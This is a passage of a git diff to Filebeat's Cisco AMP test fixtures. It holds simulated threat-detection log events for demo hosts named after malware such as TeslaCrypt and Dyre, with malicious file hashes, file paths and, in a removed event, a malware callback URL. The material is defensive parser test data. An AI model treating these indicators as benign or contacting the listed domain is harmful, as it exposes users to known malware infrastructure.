"4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_TDSS" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6403,80 +2711,64 @@ ] }, { - "@timestamp": "2021-01-15T10:09:02.000Z", + "@timestamp": "2021-01-15T10:17:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "5a:ff:4a:a3:8a:2f" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "DFC.CustomIPList", - "cisco.amp.detection_id": "5826709511729053698", - "cisco.amp.event_type_id": 1090519084, + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], - "cisco.amp.network_info.nfm.direction": "Outgoing connection from", - "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "5a:ff:4a:a3:8a:2f" + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 613000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.4.4", - "destination.port": 80, - "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 5826709511729054000, + "event.id": 6159251516445164000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", "fileset.name": "amp", - "host.hostname": "Demo_Tinba", - "host.name": "Demo_Tinba", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 324228, - "network.direction": "egress", - "network.transport": "TCP", - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "Explorer.EXE", - "process.pid": 1600, + "log.offset": 66143, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], "related.hosts": [ - "Demo_Tinba" + "Demo_TeslaCrypt" ], "related.ip": [ - "10.10.0.0", - "8.8.4.4", "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", - "source.ip": "10.10.0.0", - "source.port": 1083, "tags": [ "cisco-amp", "forwarded" - ], - "url.domain": "dak1otavola1ndos.com", - "url.extension": "php", - "url.original": "http://dak1otavola1ndos.com/h/index.php", - "url.path": "/h/index.php", - "url.scheme": "http" + ] } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log new file mode 100644 index 00000000000..4a0581fcd4d --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log @@ -0,0 +1,45 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} 